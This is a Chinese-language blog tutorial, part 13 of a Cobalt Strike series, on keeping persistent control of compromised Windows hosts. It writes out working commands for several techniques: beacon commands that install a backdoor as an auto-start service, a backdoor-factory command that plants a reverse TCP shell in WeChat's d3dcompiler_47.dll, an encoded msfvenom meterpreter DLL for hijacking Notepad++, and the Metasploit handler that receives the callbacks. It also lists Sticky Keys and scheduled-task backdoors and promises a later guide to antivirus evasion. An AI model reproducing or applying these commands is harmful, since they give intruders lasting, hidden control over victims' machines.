Cobaltstrike系列教程(十三)控制持久化

admin

104946
文章

87
评论

2022年2月28日12:40:13评论299 views字数 2304阅读7分40秒阅读模式

Cobaltstrike系列教程(十三)控制持久化

0x001-右键菜单实现控制持久化

在windows中，拿到目标主机权限后，，维持权限是必不可少的工作。
目前常见的手法有:

1.注册表
2.启动项
3.计时任务
4.设置服务
5.shift后门
6.dll劫持(白加黑)
7.利用其他安装的软件

在之前给出的插件中，已经包含了控制持久化的插件
如图，里面包含了很多控制持久化的方法，可自动执行

Cobaltstrike系列教程(十三)控制持久化

前几个Persist(※)貌似都是劫持关键程序的dll实现控制持久化
Sticky Keys是大家熟悉的粘滞键后门(shift后门，摁五下shift弹出cmd窗口)
Scheduled Job方法为写计划任务维持权限。
最后一个我也没整明白什么意思，大牛们知道嘛？
利用这个菜单实现控制持久化虽然方便，但是存在一定的局限，也有很多问题，下面简单讲两种个人常用的维持权限的方法。

0x002-Windows Service维持权限

在cobaltstrike中生成一个Windows service服务后门

Cobaltstrike系列教程(十三)控制持久化

导出时后门名为beacon.exe

Cobaltstrike系列教程(十三)控制持久化

随后在beacon中执行如下命令

beacon> cd C:WINDOWSTemp
[] cd C:WINDOWSTemp
[+] host called home, sent: 24 bytes

beacon> upload /root/beacon.exe
[] Tasked beacon to upload /root/beacon.exe as beacon.exe
[+] host called home, sent: 309782 bytes
beacon> shell sc create "thisisserver" binpath= "C:WINDOWSTempbeacon.exe"
[] Tasked beacon to run: sc create "thisisserver" binpath= "C:WINDOWSTempbeacon.exe"
[+] host called home, sent: 93 bytes
[+] received output:
[SC] CreateService 成功

beacon> shell sc description "thisisserver" "description"
[] Tasked beacon to run: sc description "thisisserver" "description"
[+] host called home, sent: 74 bytes
[+] received output:
[SC] ChangeServiceConfig2 成功

beacon> shell sc config "thisisserver" start= auto
[] Tasked beacon to run: sc config "thisisserver" start= auto
[+] host called home, sent: 67 bytes
[+] received output:
[SC] ChangeServiceConfig 成功

beacon> shell net start "thisisserver"
[] Tasked beacon to run: net start "thisisserver"
[+] host called home, sent: 55 bytes*

这样的话目标机每次开机都会运行你的beacon.exe后门实现控制的持久化。
当然，如果目标主机存在杀毒全家桶的话，那么对你后门的免杀是有很高要求的，至于cobaltstrike后门的免杀，打算过一段时间做个番外篇讲，老铁们可以关注下~

0x003-dll劫持(白加黑)维持权限

Dll劫持的话，主要是劫持那些经常运行程序的dll，这样程序一运行，就会加载我们的恶意dll。实现控制持久化。

我们来看一个例子，劫持微信的dll

首先使用Process Explore查看微信调用的文件

Cobaltstrike系列教程(十三)控制持久化

本次测试，是劫持的他的d3dcompiler_47.dll
使用backdoor factory制作dll后门(保存在目录的backdoored文件夹下)
链接:https://github.com/secretsquirrel/the-backdoor-factory
命令如下。

python backdoor.py -f d3dcompiler_47.dll -s reverse_shell_tcp_inline -P 6666 -H 8.8.8.8(你的teamserver)

Cobaltstrike系列教程(十三)控制持久化

把这个加了后门的dll放到微信程序的文件夹下
用cobaltstrike配置一个tcp协议监听6666端口的Listener，或者nc监听6666端口，目标机运行微信时，即可收到反弹的shell。

再看一个，劫持notepad的dll：

我们首先打开Kali，用Metasploit或者cobaltstrike来生成一个dll木马
Metasploit生成dll后门命令。

msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.199.107 lport=6666 -f dll > ./Msimg32.dll

Cobaltstrike生成dll后门方法

Cobaltstrike系列教程(十三)控制持久化

然后配置6666端口的监听
Metasploit:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.199.107
set lport 6666
exploit

Cobaltstrike:
请看教程第二节

然后我们把dll放到notepad文件夹中，运行notpad++，即可返回会话。

Cobaltstrike系列教程(十三)控制持久化

本文始发于微信公众号（疯猫网络）：Cobaltstrike系列教程(十三)控制持久化

左青龙
微信扫一扫

右白虎
微信扫一扫

Cobaltstrike系列教程(十三)控制持久化

0x001-右键菜单实现控制持久化

0x002-Windows Service维持权限

0x003-dll劫持(白加黑)维持权限

我们来看一个例子，劫持微信的dll

再看一个，劫持notepad的dll：

Linux提权之suid提权

抓不到包？不可能（上篇）

Nmap如何绕过防火墙

文件泄露总结

一次真实的攻防溯源案例

如何选择宝塔面板LNMP和LAMP环境套件(宝塔面板linux)

John密码破解姿势

域内渗透手法全解（万字长文+实验）适合收藏

总结 | 横向渗透中RDP利用姿势全总结

vulnhub之Tempus-Fugit的实践

发表评论

在线咨询

微信